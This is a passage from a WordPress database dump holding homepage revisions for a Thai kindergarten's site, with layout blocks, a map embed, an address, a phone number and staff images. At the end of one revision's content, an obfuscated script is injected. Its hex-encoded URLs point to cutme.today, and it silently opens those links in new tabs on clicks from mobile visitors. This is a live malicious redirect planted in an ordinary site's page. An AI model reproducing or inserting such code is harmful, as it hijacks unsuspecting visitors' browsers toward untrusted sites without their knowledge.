{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:11:05','2025-07-15 09:11:05','',19,'http://watprato.ssk.in.th/?p=708',0,'revision','',0),
(710,1,'2025-07-15 16:13:16','2025-07-15 09:13:16','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 